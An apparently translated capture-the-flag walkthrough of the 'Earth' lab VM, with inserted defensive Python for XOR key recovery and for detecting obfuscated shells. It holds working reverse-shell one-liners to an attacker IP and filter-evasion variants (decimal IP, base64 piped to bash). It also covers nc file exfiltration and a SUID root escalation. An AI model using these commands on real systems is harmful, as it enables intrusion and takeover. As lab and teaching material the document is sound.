1. Preparation

Download link
Attacker (Kali): 192.168.40.20
Target: 192.168.40.32

2. Information gathering

2.1 Host discovery

nmap -sP 192.168.40.0/24

2.2 Port scan

nmap -p- -Pn 192.168.40.32

2.3 Service version detection

nmap -p- -sV -A -Pn 192.168.40.32

2.4 Web access returns an error



The guess is that this is a DNS (name resolution) issue, so add the following hosts entries:
vi /etc/hosts
192.168.40.32 earth.local
192.168.40.32 terratest.earth.local
Access by hostname now succeeds.

Nothing of note in the page source either.

2.5 Directory scan

dirsearch -u http://earth.local/

dirsearch -u https://terratest.earth.local

Open https://terratest.earth.local/robots.txt

https://terratest.earth.local/testingnotes.txt

The notes say:

  1. XOR encryption is used
  2. testdata.txt is the test content
  3. terra is the username
    Clearly the goal is to decrypt. Since XOR is its own inverse, XORing the ciphertext with the known plaintext (testdata.txt) gives back the key.

2.6 Decryption

The decryption script is as follows:

import binascii

# one of the three strings from the home page (elided in this copy of the page)
data = "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"

# contents of testdata.txt
f = "According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."

# ciphertext bytes and known-plaintext bytes
cipher = binascii.unhexlify(data)
plain = f.encode('utf-8')

# XOR is its own inverse: ciphertext XOR plaintext gives back the key stream.
# XORing byte by byte (instead of as two big integers) keeps leading zero
# bytes and the alignment intact; both inputs are assumed to have the same length.
data_fin = bytes(c ^ p for c, p in zip(cipher, plain))
print(data_fin.decode('utf-8'))

Decryption yields the password earthclimatechangebad4humans
Back at the login page http://earth.local/admin/login
Credentials: terra:earthclimatechangebad4humans
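The decryption step above rests on one property of XOR: ciphertext XOR known plaintext equals the key stream, and a repeating key then shows up as a repeating pattern in that stream. The following is an added example, not code from the original write-up, that implements this in general (encrypt, decrypt, recover the key from a known plaintext, collapse the stream to its shortest repeating unit) and also shows why the common big-integer shortcut can break: hex() drops leading zero nibbles, so a result whose first byte is below 0x10 comes back with an odd length that unhexlify() rejects. The key "k3y!" and the plaintext are constructed and are not the box's values.

```python
# Added example (not from the original write-up): repeating-key XOR and
# known-plaintext key recovery, the property the decryption step relies on.
# All inputs are constructed; the key "k3y!" is not the box's key.


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings over their overlapping length, left-aligned."""
    return bytes(x ^ y for x, y in zip(a, b))


def repeating_key_xor(data: bytes, key: bytes) -> bytes:
    """Encrypt or decrypt (the operation is its own inverse) with a repeating key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def shortest_period(stream: bytes) -> bytes:
    """Collapse a key stream to the shortest prefix that repeats to reproduce it."""
    n = len(stream)
    for p in range(1, n + 1):
        if all(stream[i] == stream[i % p] for i in range(n)):
            return stream[:p]
    return stream


def recover_key(ciphertext_hex: str, known_plaintext: bytes) -> bytes:
    """Known-plaintext recovery for XOR: ciphertext XOR plaintext = key stream."""
    stream = xor_bytes(bytes.fromhex(ciphertext_hex), known_plaintext)
    return shortest_period(stream)


def int_style_xor_hex(a: bytes, b: bytes) -> str:
    """The big-integer shortcut seen in many write-ups: it right-aligns the
    operands and hex() drops leading zero nibbles, so the hex string it
    returns can have an odd length, which binascii.unhexlify() rejects."""
    return hex(int(a.hex(), 16) ^ int(b.hex(), 16))[2:]


if __name__ == "__main__":
    key = b"k3y!"
    plaintext = b"Earth formed over 4.5 billion years ago."
    ciphertext = repeating_key_xor(plaintext, key)
    print("recovered key:", recover_key(ciphertext.hex(), plaintext))
    print("byte-wise XOR :", xor_bytes(b"\x01A", b"\x01B").hex())   # 0003
    print("int-style XOR :", int_style_xor_hex(b"\x01A", b"\x01B"))  # 3
```

recover_key() assumes the known plaintext is aligned with the start of the ciphertext, which is the situation in the write-up (testdata.txt is the whole plaintext); with a plaintext fragment from the middle of the message the offset would have to be searched for as well.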

3. Shell

3.1 Reverse shell


The reverse shell is blocked:
bash -i >& /dev/tcp/192.168.40.20/8888 0>&1

Check with a ping: ping -c 1 192.168.40.32

Pinging baidu works.

So the filter is on the IP address.
Two ways around it:

  • Decimal IP address
    Original: bash -i >& /dev/tcp/192.168.40.20/8888 0>&1
    Transformed: bash -i >& /dev/tcp/3232245780/8888 0>&1
  • base64 encoding
    Original: nc -e /bin/bash 192.168.40.20 8888
    Encoded: bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDAuMjAgODg4OA
    Decoded through a pipe: echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDAuMjAgODg4OA|base64 -d|bash
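Both variants work for the same reason: the filter matches the literal dotted address, and neither the decimal spelling nor the base64 blob contains it. A filter or a detection rule that wants to catch these has to normalise the command first. The following is an added example, not code from the original write-up, that does that normalisation from the defender's side: it rewrites an integer IPv4 spelling back to dotted form, decodes a base64 literal that is piped into a shell, and only then looks for the connect-back patterns. The sample command lines are constructed (the first three are the commands from the write-up, the fourth is benign) and stand in for whatever a command-audit log would record; the finding names are this example's own.

```python
import base64
import ipaddress
import re

# Constructed sample command lines as a command-audit log might record them.
# The first three are the commands from the write-up; the last one is benign.
SAMPLE_COMMANDS = [
    "bash -i >& /dev/tcp/192.168.40.20/8888 0>&1",
    "bash -i >& /dev/tcp/3232245780/8888 0>&1",
    "echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDAuMjAgODg4OA|base64 -d|bash",
    "ls -la /var/www",
]

DEV_TCP = re.compile(r"/dev/tcp/([^/\s]+)/(\d+)")
NC_E = re.compile(r"\bnc\b.*?\s-e\s+\S+\s+(\S+)\s+(\d+)")
B64_PIPE = re.compile(
    r"echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b"
)


def normalise_host(token: str) -> str:
    """Rewrite a decimal integer IPv4 spelling as a dotted quad; hostnames
    and ordinary dotted addresses are returned unchanged."""
    try:
        return str(ipaddress.IPv4Address(int(token, 10)))
    except ValueError:
        return token


def decode_base64_stage(cmd: str):
    """If the command pipes a base64 literal into a shell, return the decoded
    command, otherwise None. Padding is restored because Python's decoder
    insists on it while the blob in the write-up carries none."""
    m = B64_PIPE.search(cmd)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(cmd: str):
    """Return (finding, detail) pairs for one command line after de-obfuscation."""
    findings = []
    decoded = decode_base64_stage(cmd)
    if decoded is not None:
        findings.append(("base64-wrapped command", decoded))
        cmd = decoded
    for m in DEV_TCP.finditer(cmd):
        raw, host = m.group(1), normalise_host(m.group(1))
        if host != raw:
            findings.append(("non-dotted IP spelling", f"{raw} -> {host}"))
        findings.append(("/dev/tcp connect-back", f"{host}:{m.group(2)}"))
    m = NC_E.search(cmd)
    if m:
        findings.append(("nc -e shell", f"{normalise_host(m.group(1))}:{m.group(2)}"))
    return findings


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(cmd)
        for name, detail in analyse(cmd) or [("clean", "")]:
            print(f"  {name}: {detail}")
```

The point of the normalisation is that the decision is made on the recovered address and command, not on their surface spelling; a rule that only greps for "192.168.40.20" would pass both evasions on the page.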

3.2 Finding the flag

find / -name "*flag*" 2>/dev/null

/root cannot be entered: permission denied.

4. Privilege escalation

4.1 Looking for exploitable SUID binaries

find / -perm -u=s -type f 2>/dev/null

reset_root stands out; try running it.

It fails with an error.

4.2 Transfer the file back for analysis

Kali: nc -lvvp 4444 > rest_root
Target: nc 192.168.40.20 4444 < /usr/bin/reset_root
strings rest_root

The strings show that the password would be reset to Earth, but it is not clear why execution fails; perhaps some precondition is not met.
ltrace ./rest_root

ltrace traces a process's library function calls and shows which library functions are called, whereas strace traces each of the program's system calls.

Three conditions are not met: at runtime the binary checks whether these three files exist.
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
Run it again: success. Switch to root and find the flag.

4.3 Analysing the filter

python -c 'import pty; pty.spawn("/bin/bash")' to get an interactive shell

The filter matches the black-box guess.